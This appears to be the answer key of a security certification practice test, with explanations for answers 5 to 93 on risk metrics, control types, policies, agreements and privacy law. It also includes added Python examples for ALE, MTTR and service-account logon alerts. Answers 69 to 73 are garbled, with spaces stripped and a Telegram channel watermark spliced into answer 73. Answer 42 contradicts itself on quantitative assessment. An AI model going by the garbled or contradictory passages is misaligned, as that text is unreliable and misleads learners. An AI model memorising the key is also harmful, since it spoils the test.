5. A. An acceptable use policy (AUP) is a document stating what a user may or may not have access to on a company’s network or the Internet. A clean desk policy ensures that all sensitive/confidential documents are removed from an end-user workstation and locked up when the documents are not in use. Mandatory vacation policy is used by companies to detect fraud by having a second person, familiar with the duties, help discover any illicit activities. Job rotation is a policy that describes the practice of moving employees between different tasks. Job rotation can help detect fraud because employees cannot perform the same actions for long periods of time.
6. C. The PCI-DSS, or Payment Card Industry Data Security Standard, is a security standard that is mandated by credit card vendors. The Payment Card Industry Security Standards Council is responsible for updates and changes to the standard. GDPR, or the General Data Protection Regulation, is a standard for data privacy and security in the European Union (EU). COPPA is the Children’s Online Privacy Protection Act, a U.S. federal law. CIS is the Center for Internet Security and is not a law or a regulation.
7. A. Companies will use mandatory vacation policies to detect fraud by having a second person, familiar with the duties, help discover any illicit activities. Clean desk policy ensures that all sensitive/confidential documents are removed from an end-user workstation and locked up when the documents are not in use. A nondisclosure agreement (NDA) protects sensitive and intellectual data from getting into the wrong hands. Continuing education is the process of training adult learners in a broad list of postsecondary learning activities and programs. Companies will use continuing education in training their employees on the new threats and also reiterating current policies and their importance.
8. B. Locking cabinets and drawers is the best solution because they allow individuals to lock their drawers and ensure that access to a single key does not allow broad access to documents like a department door lock or proximity cards for the space. Onboarding is the process of adding an employee to a company’s identity and access management system and would not help with securing documents, but it might teach the process of doing so.
9. D. Quantitative risk assessment is the process of assigning numerical values to the probability an event will occur and what impact the event will have. Change management is the process of managing configuration changes made to a network. Vulnerability assessment attempts to identify, quantify, and rank the weaknesses in a system. Qualitative risk assessment is the process of ranking which risk poses the most danger using ratings like low, medium, and high.
10. D. A memorandum of understanding (MOU) is a type of agreement that is usually not legally binding. This agreement is intended to be mutually beneficial without involving courts or money. An SLA (service level agreement) defines the level of service the customer expects from the service provider. The level of service definitions should be specific and measurable in each area. A BPA (business partnership agreement) is a legal agreement between partners. It establishes the terms, conditions, and expectations of the relationship between the partners. An ISA (interconnection security agreement) is an agreement that specifies the technical and security requirements of the interconnection between organizations.
11. A. Escalation is necessary in cases where the current breach goes beyond the scope of the organization or investigators or is required by law. In this case, Sally believes a crime has been committed and has escalated the case to law enforcement. Other escalations might be to federal or state law enforcement, or to other more capable internal or external investigators. Tokenizing data uses a deidentified replacement data item, public notification notifies the population or customers at large, and outsourcing investigations may be done if specialized skills are needed.
12. A. The single loss expectancy (SLE) is the product of the value ($16,000) and the exposure factor (.35), or $5,600.
13. C. Antivirus is an example of a corrective control. A corrective control is designed to correct a situation. An IDS (intrusion detection system) is a detective control because it detects security breaches. An audit log is a detective control because it detects security breaches. A router is a preventive control because it prevents security breaches with access control lists (ACLs).
14. A. A deterrent control is used to warn a potential attacker not to attack. Lighting added to the perimeter and warning signs such as a “no trespassing” sign are deterrent controls. The other options are examples of detective controls. A detective control is designed to uncover a violation; although some detective controls may serve as a deterrent (for example, when a camera is visible), they are not primarily deterrent controls.
15. D. Testing and training are preventive administrative controls. Administrative controls dictate how security policies should be executed to accomplish the company’s security goals. A detective technical control uncovers a violation through technology. A preventive technical control attempts to stop a violation through technology. Detective administrative controls uncover a violation through policies, procedures, and guidelines.
16. A. Risk acceptance is a strategy of recognizing, identifying, and accepting a risk that is sufficiently unlikely or that has such limited impact that a corrective control is not warranted. Risk transfer is the act of moving the risk to hosted providers who assume the responsibility for recovery and restoration or by acquiring insurance to cover the costs emerging from a risk. Risk avoidance is the removal of the vulnerability that can increase a particular risk so that it is avoided altogether. Risk mitigation is when a company implements controls to reduce vulnerabilities or weaknesses in a system. It can also reduce the impact of a threat.
17. D. In most cases, operating a facility in a state is sufficient reason to need to comply with state laws. Jim should check with a lawyer, but he should plan on needing to comply with Illinois, Indiana, and Ohio law, as well as federal laws.
18. A. Onboarding is the process of adding an employee to a company’s identity and access management system. Offboarding is the process of removing an employee from the company’s identity and access management system. Adverse action is an official personnel action that is taken for disciplinary reasons. Job rotation gives individuals the ability to see various parts of the organization and how it operates. It also eliminates the need for a company to rely on one individual for security expertise should the employee become disgruntled and decide to harm the company. Recovering from a disgruntled employee’s attack is easier when multiple employees understand the company’s security posture.
19. A. A clean desk policy ensures that sensitive information and documents are not left on desks after hours and requires employees to place those files into a less exposed or secure location. Background checks, continuing education, and job rotation do not protect confidential information left on desks from being exposed.
20. A. As users register for an account, they enter letters and numbers they are given on the web page before they can register. This is an example of a deterrent control since it prevents bots from registering and proves this is a real person. Detective controls detect intrusion as it happens and uncover a violation. A compensating control is used to satisfy a requirement for a security measure that is too difficult or impractical to implement at the current time. Degaussing is a method of removing data from a magnetic storage media by changing the magnetic field.
21. D. A parking policy generally outlines parking provisions for employees and visitors. This includes the criteria and procedures for allocating parking spaces for employees and is not a part of organizational security policy. Instead, it is an operational or business policy. An acceptable use policy describes the limits and guidelines for users to make use of an organization’s physical and intellectual resources. This includes allowing or limiting the use of personal email during work hours. Social media policy defines how employees should use social media networks and applications such as Facebook, Twitter, LinkedIn, and others. It can adversely affect a company’s reputation. Password policies define the complexity of creating passwords. They should also define weak passwords and how users should protect password safety.
22. C. Proprietary data is a form of confidential information, and if the information is revealed, it can have severe effects on the company’s competitive edge. High is a generic label assigned to data internally that represents the amount of risk being exposed outside the company. The top-secret label is often used in governmental systems where data and access may be granted or denied based on assigned categories. Low is a generic label assigned to data internally that represents the amount of risk being exposed outside the company.
23. C. Antivirus software is used to protect computer systems from malware and is not a physical security control. Physical controls are security measures put in place to reduce the risk of harm coming to a physical property. This includes protection of personnel, hardware, software, networks, and data from physical actions and events that could cause damage or loss.
24. A. Quantitative risk assessment is the process of assigning numerical values to the probability an event will occur and what impact the event will have. Qualitative risk assessment is the process of ranking which risk poses the most danger such as low, medium, and high. A business impact analysis (BIA) is used to evaluate the possible effect a business can suffer should an interruption to critical system operations occur. This interruption could be as a result of an accident, emergency, or disaster. Threat assessment is the process of identifying and categorizing different threats such as environmental and person-made. It also attempts to identify the potential impact from the threats.
25. D. A nondisclosure agreement (NDA) protects sensitive and intellectual data from getting into the wrong hands. An NDA is a legal contract between the company and third-party vendor to not disclose information per the agreement. Encrypted data that is sent can still be decrypted by the third-party vendor if they have the appropriate certificate or the key but does not restrict access to the data. Violating an NDA would constitute unauthorized data sharing, and a violation of privileged user role-based awareness training has nothing to do with sharing proprietary information.
26. A. Detective controls like CCTV detect intrusion as it happens and can help uncover violations. Policies are administrative controls. Firewalls and intrusion prevention system (IPS) devices are technical controls. Technical controls are applied through technology and may also be deterrent, preventive, detective, or compensating.
27. C. Sharing of profits and losses and the addition or removal of a partner, as well as the responsibilities of each partner, are typically included in a BPA (business partner agreement). Expectations between parties such as a company and an Internet service provider are typically found in a service level agreement (SLA). Expectations include the level of performance given during the contractual service. An SLA will provide a clear means of determining whether a specific function or service has been provided according to the agreed-on level of performance. Security requirements associated with interconnecting IT systems are typically found in an interconnection security agreement, or ICA.
28. D. A backup generator is a compensating control—an alternate control that replaces the original control when it cannot be used due to limitations of the environment. A firewall is considered a preventive control, a security guard is considered a physical control, and an IDS (intrusion detection system) is considered a detective control.
29. A. Preventive controls stop an action from happening—in this scenario, preventing an unauthorized user from gaining access to the network when the user steps away. A corrective control is designed to correct a situation, a deterrent control is used to deter a security breach, and a detective control is designed to uncover a violation.
30. C. Job rotation allows individuals to see various parts of the organization and how it operates. It also eliminates the need for a company to rely on one individual for security expertise should the employee become disgruntled and decide to harm the company. Recovering from a disgruntled employee’s attack is easier when multiple employees understand the company’s security posture. Separation of duties is the concept of having more than one person required to complete a task, allowing problems to be noted by others involved. A mandatory vacation policy is used by companies to detect fraud by having a second person, familiar with the duties, help discover any illicit activities while the person who normally performs them is out of the office. Onboarding is the process of adding an employee to a company’s identity and access management system or other infrastructure.
31. B. Data minimization is the process of ensuring that only data that is required for business functions is collected and maintained. Tony should ensure that his organization is minimizing the data collected. Data masking redacts data but does not decrease how much is collected. Tokenization replaces sensitive values with a unique identifier that can be looked up in a lookup table. Anonymization removes the ability to identify individuals from data but is quite difficult.
32. A. Risk avoidance is a strategy to deflect threats in order to avoid the costly and disruptive consequences of a damaging event. It also attempts to minimize vulnerabilities that can pose a threat. A risk register is a document that tracks an organization’s risks and information about the risks like who owns it, if it is being remediated, and similar details. Risk acceptance is a strategy of recognizing, identifying, and accepting a risk that is sufficiently unlikely or that has such limited impact that a corrective control is not warranted. Risk mitigation is when a company implements controls to reduce vulnerabilities or weaknesses in a system. It can also reduce the impact of a threat.
33. D. Systems should be restored within four hours with a minimum loss of one day’s worth of data. The RTO (recovery time objective) is the amount of time within which a process or service must be restored after a disaster to meet business continuity. It defines how much time it takes to recover after notification of process disruption. The recovery point objective, or RPO, specifies the amount of time that can pass before the amount of data lost may exceed the organization’s maximum tolerance for data loss.
34. A. A data retention policy defines how long an organization will keep data. Removing sensitive documents not in use is a clean desk policy. A formal process for managing configuration changes is change management, and a memorandum of understanding consists of legal documents that describe mutual agreement between two parties.
35. B. ALE (annual loss expectancy) is the product of the ARO (annual rate of occurrence) and the SLE (single loss expectancy) and is mathematically expressed as ALE = ARO × SLE. Single loss expectancy is the cost of any single loss, and it is mathematically expressed as SLE = AV (asset value) × EF (exposure factor).
36. B. The Center for Internet Security (CIS) benchmarks provide recommendations for how to secure an operating system, application, or other covered technology. Michelle will find Windows 10–specific security configuration guidelines and techniques.
37. A. Preventive controls like data backups are proactive and are used to avoid a security breach or an interruption of critical services before they can happen. Security cameras, smoke detectors, and door alarms are examples of detective controls. Detective controls detect intrusion as it happens and uncover a violation.
38. C. Risk transfer is the act of moving the risk to hosted providers who assume the responsibility for recovery and restoration or by acquiring insurance to cover the costs emerging from a risk. Risk acceptance is a strategy of recognizing, identifying, and accepting a risk that is sufficiently unlikely or that has such limited impact that a corrective control is not warranted. Risk mitigation is when a company implements controls to reduce vulnerabilities or weaknesses in a system. It can also reduce the impact of a threat. Risk avoidance is the removal of the vulnerability that can increase a particular risk so that it is avoided altogether.
39. D. A preventive control is used to avoid a security breach or an interruption of critical services before they can happen. Administrative controls are defined through policies, procedures, and guidelines. A compensating control is used to satisfy a requirement for a security measure that is too difficult or impractical to implement at the current time. A deterrent control is used to deter a security breach.
40. C. Mean time between failures (MTBF) is a measurement to show how reliable a hardware component is. MTTR (mean time to repair) is the average time it takes for a failed device or component to be repaired or replaced. An RPO (recovery point objective) is the period of time a company can tolerate lost data being unrecoverable between backups. ALE (annual loss expectancy) is the product of the annual rate of occurrence (ARO) and the single loss expectancy (SLE).
41. C. A single point of failure (SPOF) is a single weakness that can bring an entire system down and prevent it from working. Cloud computing allows the delivery of hosted service over the Internet. Load balancing spreads traffic or other load between multiple systems or servers. Virtualization uses a system to host virtual machines that share the underlying resources such as RAM, hard drive, and CPU.
42. A. Quantitative risk analysis requires complex calculations and is more time-consuming because it requires detailed financial data and calculations. Quantitative risk assessment is often subjective and requires expertise on systems and infrastructure, and both types of assessment can provide clear answers on risk-based questions.
43. D. A custodian configures data protection based on security policies. The local community bank is the data owner, not Leigh Ann. Leigh Ann is a network administrator, not a user, and power user is not a standard security role in the industry.
44. B. Risk acceptance is a strategy of recognizing, identifying, and accepting a risk that is sufficiently unlikely or has such limited impact that a corrective control is not warranted. Risk mitigation is when a company implements controls to reduce vulnerabilities or weaknesses in a system. It can also reduce the impact of a threat. Risk avoidance is the removal of the vulnerability that can increase a particular risk so that it is avoided altogether. Risk transfer is the act of moving the risk to other organizations like insurance providers or hosting companies who assume the responsibility for recovery and restoration or by acquiring insurance to cover the costs emerging from a risk.
45. A. Data owners assign labels such as top secret to data. Custodians assign security controls to data. A privacy officer ensures that companies comply with privacy laws and regulations. System administrators are responsible for the overall functioning of IT systems.
46. C. Employees can leak a company’s confidential information. Exposing a company’s information could put the company’s security position at risk because attackers can use this information as part of attacks against the company. Gaining access to a computer’s MAC address is not relevant to social media network risk. Gaining access to a computer’s IP address is not relevant to social media network risk. Employees can easily express their concerns about a company in general. This is not relevant to social media network risk as long as the employee doesn’t reveal any confidential information.
47. C. Separation of duties is the concept of having more than one person required to complete a task. A background check is a process that is performed when a potential employee is considered for hire. Job rotation allows individuals to see various parts of the organization and how it operates. It also eliminates the need for a company to rely on one individual for security expertise should the employee become disgruntled and decide to harm the company. Recovering from a disgruntled employee’s attack is easier when multiple employees understand the company’s security posture. Collusion is an agreement between two or more parties to defraud a person of their rights or to obtain something that is prohibited by law.
48. B. ALE (annual loss expectancy) = SLE (single loss expectancy) × ARO (annualized rate of occurrence). SLE equals $750,000 (2,500 records × $300), and ARO equals 5%, so $750,000 times 5% equals $37,500.
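The SLE = AV × EF and ALE = SLE × ARO formulas from answers 12, 35 and 48, carried through in code as an added example that is not part of the book. The figures for the record breach and the flood scenario reproduce the numbers in answers 48 and 12; the small risk register, the ARO for the flood, the laptop-theft entry and the control cost-benefit function are constructed assumptions, and the block generalizes the two single-risk calculations to ranking a whole register by ALE.

```python
"""Quantitative risk metrics: SLE = AV x EF and ALE = SLE x ARO.

Added example (not from the practice test book). The risk register below is
constructed for illustration; two entries reuse the numbers from answers 12
and 48 so the results can be checked against the book.
"""
from dataclasses import dataclass


@dataclass
class Risk:
    name: str
    asset_value: float      # AV: value of the asset (or of the records at risk)
    exposure_factor: float  # EF: fraction of AV lost in one occurrence, 0.0 to 1.0
    annual_rate: float      # ARO: expected number of occurrences per year


def single_loss_expectancy(asset_value: float, exposure_factor: float) -> float:
    """SLE = AV x EF, the cost of a single occurrence of the loss event."""
    if not 0.0 <= exposure_factor <= 1.0:
        raise ValueError("exposure factor must be between 0 and 1")
    return asset_value * exposure_factor


def annualized_loss_expectancy(sle: float, annual_rate: float) -> float:
    """ALE = SLE x ARO, the expected loss per year from this event."""
    if annual_rate < 0:
        raise ValueError("annual rate of occurrence cannot be negative")
    return sle * annual_rate


def ale_for(risk: Risk) -> float:
    """ALE of one register entry, composed from the two formulas above."""
    sle = single_loss_expectancy(risk.asset_value, risk.exposure_factor)
    return annualized_loss_expectancy(sle, risk.annual_rate)


def rank_risks(register: list[Risk]) -> list[tuple[str, float]]:
    """Order a risk register by ALE, highest first, so the largest expected
    annual losses are treated first."""
    return sorted(((r.name, ale_for(r)) for r in register),
                  key=lambda item: item[1], reverse=True)


def control_value(ale_before: float, ale_after: float, annual_control_cost: float) -> float:
    """Annual value of a safeguard (assumed cost-benefit form, not from the book):
    (ALE before the control) - (ALE after the control) - (annual cost of the control).
    A positive result means the control pays for itself; a negative one suggests
    acceptance or a cheaper mitigation."""
    return (ale_before - ale_after) - annual_control_cost


# Constructed register. The first entry uses answer 48's figures (2,500 records
# at $300 each, ARO 5%); the second uses answer 12's AV and EF with an assumed ARO.
REGISTER = [
    Risk("Customer record breach", asset_value=2_500 * 300, exposure_factor=1.0, annual_rate=0.05),
    Risk("Server room flood", asset_value=16_000, exposure_factor=0.35, annual_rate=0.1),
    Risk("Laptop theft", asset_value=2_000, exposure_factor=1.0, annual_rate=3.0),
]

if __name__ == "__main__":
    for name, ale in rank_risks(REGISTER):
        print(f"{name:24s} ALE = ${ale:,.2f}")
    # Would a $20,000/year control that cuts the breach ALE to $7,500 be worth it?
    print("control value:", control_value(37_500, 7_500, 20_000))
```

The two validation checks guard against the usual spreadsheet mistakes: an exposure factor entered as a percentage (35 instead of 0.35) or a negative rate silently produce nonsense otherwise.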
49. C. RPO (recovery point objective) specifies the allowable data loss. It is the amount of time that can pass during an interruption before the quantity of data lost during that period surpasses business continuity planning’s maximum acceptable threshold. MTBF (mean time between failures) is the rating on a device or component that predicts the expected time between failures. MTTR (mean time to repair) is the average time it takes for a failed device or component to be repaired or replaced. ARO (annual rate of occurrence) is the ratio of an estimated possibility that a threat will take place within a one-year time frame.
50. D. A data retention policy states how data should be stored based on various types, such as storage location, amount of time the data should be retained, and the type of storage medium that should be used. A clean desk policy ensures that all sensitive/confidential documents are removed from an end-user workstation and locked up when the documents are not in use. An AUP, or acceptable use policy, describes the limits and guidelines for users to make use of an organization’s physical and intellectual resources. This includes allowing or limiting the use of personal email during work hours. A security policy defines how to secure physical and information technology assets. This document should be continuously updated as technology and employee requirements change.
51. C. Onboarding is the process of adding an employee to a company’s identity and access management system. Offboarding is the process of removing an employee from the company’s identity and access management system. A system owner is an individual who is in charge of managing one or more systems and can include patching and updating operating systems. An executive user was made up for this question.
52. B. Separation of duty can be classified as an operational control that attempts to minimize fraud by ensuring that an individual cannot exploit a process and conceal the errors or issues that they are creating. It is not a physical control or a technical control, and nothing in the question indicates that this is compensating for gaps left by another control.
53. D. The General Data Protection Regulation (GDPR) does not include a right to anonymity, although organizations must be able to provide security safeguards that may include anonymization where appropriate.
54. D. The NIST RMF’s process is:
1. Prepare
2. Categorize system
3. Select controls
4. Implement controls
5. Assess controls
6. Authorize system
7. Monitor controls
55. B. Security program administrators often use different types of training to ensure that trainees who react and respond differently to training are given training that helps them. There may be other valid reasons, but this is the most common reason for training diversity.
56. A. Risks that the organization itself creates are internal risks. External risks are those created by factors outside the organization’s control. Qualitative and quantitative are both types of risk assessment, rather than categorizations of risk.
57. B. Risk registers are documents used by organizations to track and manage risks and include information such as the owner or responsible party, details about the risk, and other useful information. Statement on Standards for Attestation Engagements (SSAEs) are audit reports, Payment Card Industry Data Security Standard (PCI-DSS) is a security standard used for credit card operations, and risk table is not a common industry term.
58. C. The mean time to repair (MTTR) for a system or device is the average time that it will take to repair it if it fails. The MTTR is used as part of business continuity planning to determine if a system needs additional redundancy or other options put in place if a failure and repair would exceed the maximum tolerable outage. It is calculated by dividing the total maintenance time by the total number of repairs. MTBF is the mean time between failures, MTTF the mean time to fail, and MITM is an on-path attack, a term that has been increasingly replaced with on-path.
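The MTTR calculation in answer 58, and its use in business continuity planning to find systems whose repair time exceeds the maximum tolerable outage, as an added example that is not from the book. The repair records and the per-system outage limits are constructed; the only formula used is the one the answer states, total maintenance time divided by the number of repairs.

```python
"""MTTR from a maintenance log, checked against the maximum tolerable outage.

Added example, not from the practice test book. REPAIR_LOG and
MAX_TOLERABLE_OUTAGE are constructed sample data; MTTR is computed exactly
as answer 58 describes it: total repair time / number of repairs.
"""
from collections import defaultdict

# Constructed repair records: (system name, repair duration in hours)
REPAIR_LOG = [
    ("web-cluster", 0.5), ("web-cluster", 1.0), ("web-cluster", 1.5),
    ("legacy-erp", 6.0), ("legacy-erp", 12.0),
    ("mail", 2.0),
]

# Constructed maximum tolerable outage per system, in hours (from the BIA)
MAX_TOLERABLE_OUTAGE = {"web-cluster": 4.0, "legacy-erp": 8.0, "mail": 24.0}


def mean_time_to_repair(repair_log, system=None):
    """MTTR = total maintenance time / total number of repairs.
    With system=None the mean is taken over every record; otherwise only over
    that system's repairs."""
    durations = [d for s, d in repair_log if system is None or s == system]
    if not durations:
        raise ValueError("no repair records to average")
    return sum(durations) / len(durations)


def mttr_by_system(repair_log):
    """Per-system MTTR, accumulating total time and repair count in one pass."""
    totals = defaultdict(lambda: [0.0, 0])
    for system, duration in repair_log:
        totals[system][0] += duration
        totals[system][1] += 1
    return {s: time / count for s, (time, count) in totals.items()}


def systems_needing_redundancy(repair_log, limits):
    """Systems whose MTTR exceeds their maximum tolerable outage, which is
    the case the answer describes as needing redundancy or other options.
    A system with no recorded limit is never flagged."""
    per_system = mttr_by_system(repair_log)
    return sorted(s for s, mttr in per_system.items()
                  if mttr > limits.get(s, float("inf")))


if __name__ == "__main__":
    for system, mttr in mttr_by_system(REPAIR_LOG).items():
        print(f"{system:12s} MTTR = {mttr:.1f} h (limit {MAX_TOLERABLE_OUTAGE[system]:.1f} h)")
    print("needs redundancy:", systems_needing_redundancy(REPAIR_LOG, MAX_TOLERABLE_OUTAGE))
```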
59. D. Common results of breaches like this include identity theft using the personal information of the customers, financial loss to the company due to breach costs and lawsuits, and reputational loss. Since the incident response process is over, Olivia’s company should have remediated the underlying issues that led to the breach, hopefully preventing further downtime and thus availability loss.
60. D. There is no civilian classification level for government data. Data may be unclassified, or sensitive but unclassified. Top Secret, Secret, and Confidential are all commonly used classifications.
61. B. The source code for a product is not typically used as a location for privacy terms and conditions. Instead, they are in the contract, user license or related legal terms, or in a formal privacy notice.
62. B. Pseudonymization can allow reidentification of the data subject if additional data is available. Properly done anonymization cannot be reversed. Anonymization techniques will group information so that individuals cannot be identified from data and use other techniques to prevent additional information from leading to de-anonymization of individuals.
63. A. A data governance policy clearly states who owns the information collected and used by an organization. Information security policies provide the high-level authority and guidance for security programs and efforts. Acceptable use policies (AUPs) define what information resources can be used for and how. Data retention policies establish what information an organization will collect and how long it will be kept before destruction.
64. C. Helen has created a functional recovery plan focused on a specific technical and business function. A disaster recovery plan (DRP) has a broader perspective and might include multiple functional recovery plans. RPOs, or recovery point objectives, and MTBF, or mean time between failures, are not types of plans typically built by organizations.
65. B. Health information may be covered by state, local, or federal law, and Greg’s organization should ensure that they understand any applicable laws before storing, processing, or handling health information.
66. C. Control risks specifically apply to financial information, where they may impact the integrity or availability of the financial information.
67. D. An individual is most likely to face identity theft issues if their personally identifiable information (PII) is stolen or breached.
68. C. It is common practice to prohibit interactive logins to a GUI or shell for service accounts. Use of a service account for interactive logins or attempting to log in as one should be immediately flagged and alerted on as an indicator of compromise (IoC).
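Detection logic for the IoC in answer 68, as an added example that is not from the book: it scans authentication events and raises an alert for every interactive logon, successful or failed, by a service account. The log lines and their key=value layout are constructed, the "svc_" naming convention for service accounts is an assumption, and the numeric logon types follow the Windows convention (2 interactive, 10 remote interactive, 11 cached interactive, 3 network, 4 batch, 5 service).

```python
"""Flag interactive logons by service accounts as an indicator of compromise.

Added example, not from the practice test book. SAMPLE_LOG is constructed;
the 'svc_' prefix is an assumed naming convention, and the logon type
numbers follow the Windows convention noted below.
"""
import re
from dataclasses import dataclass

# Windows logon types that mean a human-style session: 2 = local interactive,
# 10 = RemoteInteractive (RDP), 11 = CachedInteractive. Types 3 (network),
# 4 (batch) and 5 (service) are how a service account is expected to be used.
INTERACTIVE_LOGON_TYPES = {2, 10, 11}
SERVICE_ACCOUNT_PREFIX = "svc_"  # assumed naming convention for service accounts

LINE_RE = re.compile(
    r"^(?P<ts>\S+) host=(?P<host>\S+) user=(?P<user>\S+) "
    r"logon_type=(?P<ltype>\d+) result=(?P<result>success|failure)$"
)


@dataclass(frozen=True)
class Alert:
    timestamp: str
    host: str
    user: str
    logon_type: int
    result: str


def is_service_account(user: str) -> bool:
    """Case-insensitive match on the assumed prefix."""
    return user.lower().startswith(SERVICE_ACCOUNT_PREFIX)


def parse_line(line: str):
    """Return the event fields, or None for a line that does not fit the format.
    Malformed lines are skipped rather than silently treated as benign events."""
    match = LINE_RE.match(line.strip())
    return match.groupdict() if match else None


def find_service_account_interactive_logons(lines) -> list[Alert]:
    """Both successful and failed attempts are alerted on: a failed interactive
    logon as a service account is still someone trying to use it interactively."""
    alerts = []
    for line in lines:
        event = parse_line(line)
        if event is None:
            continue
        logon_type = int(event["ltype"])
        if is_service_account(event["user"]) and logon_type in INTERACTIVE_LOGON_TYPES:
            alerts.append(Alert(event["ts"], event["host"], event["user"],
                                logon_type, event["result"]))
    return alerts


# Constructed sample events; only three of them should produce alerts.
SAMPLE_LOG = """\
2024-05-01T08:00:01Z host=app01 user=svc_backup logon_type=5 result=success
2024-05-01T08:01:12Z host=app01 user=alice logon_type=2 result=success
2024-05-01T08:05:44Z host=db02 user=svc_sql logon_type=3 result=success
2024-05-01T08:07:09Z host=jump01 user=svc_backup logon_type=10 result=failure
2024-05-01T08:07:31Z host=jump01 user=svc_backup logon_type=10 result=success
this line is malformed and must be skipped
2024-05-01T08:09:00Z host=ws17 user=SVC_monitor logon_type=2 result=success
"""

if __name__ == "__main__":
    for a in find_service_account_interactive_logons(SAMPLE_LOG.splitlines()):
        print(f"IoC: {a.user} interactive logon (type {a.logon_type}, {a.result}) "
              f"on {a.host} at {a.timestamp}")
```

In a real deployment the prefix check would be replaced by a lookup against the identity system's list of service accounts, since naming conventions drift; the rest of the logic is unchanged.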
69. C. Assetmanagementpoliciestypicallyincludeallstagesofanasset’slifecycle,andassettagslikethosedescribedareusedtotrackassetsinmanyorganizations.Changemanagement,incidentresponse,andacceptableusepoliciesdonotrequireassettagging.
70. D. Thediagramshowsafullyredundantinternalnetworkwithpairsoffirewalls,routers,andcoreswitches,butwithasingleconnectiontotheInternet.ThismeansthatMeganshouldconsiderhowherorganizationwouldconnecttotheoutsideworldifthatlinkwasseveredordisrupted.Thereisnoindicationwhetherthisisawiredorwirelesslink,andtheimagedoesnotshowaredundantlink.
71. D. Emmashouldcategorizethisasasupplychainrisk.Whenorganizationscannotgetthesystems,equipment,andsuppliestheyneedtooperate,itcanhavesignificantimpactontheirabilitytoconductbusiness.Thatcouldcreatefinancialrisk,butfinancialriskisnotthedirectriskhere.Thereisnoindicationthatthevendorwillnotsupportthesystems,noristhereanyinformationaboutwhetherthereisanintegrationissueinthedescription.
72. A. Anintrusiondetectionsystem(IDS)candetectattacks,andisadetectivecontrol.Sinceitisatechnicalsystemratherthanaphysicalcontroloranadministrativepolicyorprocedure,Henrycancorrectlycategorizeitasatechnical,detectivecontrol.
73. C. TheFederalTradeCommission(FTC)doesnotprovidesecurityconfigurationguidesorbenchmarksforoperatingsystemsordevices.The
Telegram Channel @nettrain
CenterforInternetSecurity(CIS),Microsoft(andothervendors),andtheNationalSecurityAgency(NSA)allprovideconfigurationbenchmarks.
74. C. Legacy systems that no longer receive support are a significant concern because they cannot be patched if security vulnerabilities are discovered. Windows 2008 reached its end of life in January 2020. It ran on both 32-bit and 64-bit platforms, and you can still install modern web servers on it.
75. B. Patching is a form of avoidance because it works to remove a risk from the environment. Acceptance of flaws that need patching would involve leaving the software unpatched; mitigation strategies might include firewalls, intrusion prevention systems (IPSs), or web application firewall (WAF) devices; and transference options include third-party hosting or services.
76. B. Risk heat maps or a risk matrix can allow an organization to quickly look at risks and compare them based on their probability and impact or other rating elements. Qualitative and quantitative risk assessments are types of assessment, not means of presenting risk information in an easy-to-understand format, and risk plots are not a common term used in the field.
77. A. The fines that can result from violation or infringement of regulations like the General Data Protection Regulation can have a significant impact on an organization, or could even potentially put it out of business. Due to this, organizations will track compliance with regulations as part of their risk posture.
78. D. Disaster recovery requires forethought and preparation, response to issues to minimize impact during a disaster, and response activities after a disaster. Thus, a complete disaster recovery plan should include actions that may or will occur before, during, and after a disaster, and not just the recovery process after the fact.
79. B. Although data breaches could result in termination of a card processing agreement, the fact that her organization is noncompliant is most likely to result in a fine. PCI-DSS, or Payment Card Industry Data Security Standard, is a vendor standard, not a law, and criminal charges would not typically be filed in a situation like this.
80. C. The Cloud Security Alliance's Cloud Control Matrix maps existing standards to common control descriptions, allowing control requirements to be compared and validated across many standards and regulations. The CSA reference architecture is a set of standard designs, and ISO 27001 and ISO 27002 are standards for managing information security.
81. B. Gamification makes training into a game to get more involvement and interest. Scoring points and receiving rewards, either in-game or virtually, can have a significant positive impact on the response to training. Capture-the-flag events focus on techniques like finding hidden information or otherwise obtaining "flags" as part of a contest. Phishing campaigns send fake phishing emails to staff to identify individuals who may fall for them. Role-based training focuses on training specifically for the role or job that an individual has or will have.
82. D. The General Data Protection Regulation, or GDPR, requires a data protection officer (DPO). They oversee the organization's data protection strategy and implementation, and make sure that the organization complies with the GDPR.
83. D. Although recovering from a breach can be costly, the loss of data like intellectual property in circumstances like these is the most critical issue. The institution is likely to suffer reputational harm and may not be trusted to conduct research like this in the future, leading to an even greater cost to the university's ability to do new research with the government.
84. B. Mission-essential functions are defined as those functions that an organization must run throughout a disaster or that must be resumed as quickly as possible after one if they cannot be sustained. They are the core functions of the organization and are key to its success and ongoing existence. A single point of failure (SPOF) is a point where a device, system, or resource can fail and cause an entire function or organization to no longer work. Recovery time objectives (RTOs) are the time allotted to return to normal functionality. Core recovery functions were made up for this question.
85. B. An SLA (service level agreement) defines the level of service the customer expects from the service provider. The level of service definitions should be specific and measurable in each area. An MOU (memorandum of understanding) is a legal document that describes a mutual agreement between parties. An ISA (interconnection security agreement) is an agreement that specifies the technical and security requirements of the interconnection between organizations. A BPA (business partnership agreement) is a legal agreement between partners. It establishes the terms, conditions, and expectations of the relationship between the partners.
86. A. Customer data can include any information that a customer uploads, shares, or otherwise places in or creates via a service. Customers may have contractual security guarantees in the terms of service, and notification or other clauses may also impact what Rick needs to do if the data is breached. PII is personally identifiable information like name, address, or other details that can identify a person. Financial information may include bills, account balances, and similar details. Health information covers a broad range of data about an individual's medical and health status or history.
87. C. Theft of proprietary information like a formula or code is an example of intellectual property (IP) theft. The cost of an IP loss can be harder to quantify than other losses in many cases, but it can have a significant impact on an organization that relies on the IP for its business. External risk is risk created by factors outside the organization, internal risk is created by the organization itself or its decisions, and licensing risk exists through software and other contracts.
88. B. This is an example of a personnel credential policy since it applies to the staff who are employed by his organization. Policies like this help to ensure that accounts are not shared or reused. There is no mention of specific devices, service accounts, or administrative accounts.
89. C. The likelihood of occurrence, or probability, is multiplied by the impact to determine a risk's severity.
90. D. Organizations can decide how they want to determine asset value, but consistency is important in many cases. Thus, the original cost, the replacement cost, or a depreciated cost may be used.
91. A. A business impact analysis (BIA) helps to identify critical systems by determining which systems will create the largest impact if they are not available. MTBF is the mean time between failures, an RTO is a recovery time objective, and an ICD was made up for this question.
92. D. The most common means of transferring breach risk is to purchase cybersecurity insurance. Accepting breaches is rarely considered a valid risk process, blaming breaches on competitors does not actually transfer risk, and selling data to another organization is not a risk handling process but may be a business process.
93. B. Service accounts are not typically allowed to use interactive logins, and thus prohibiting interactive logins is a common security policy for them. Limited login hours or locations are more commonly used for employee accounts when they should not be accessing resources after hours or from nonwork locations. Frequent password expiration for service accounts is actually likely to cause a service outage, and many service accounts have complex passwords and are set with longer password expiration timeframes or are set to never expire.
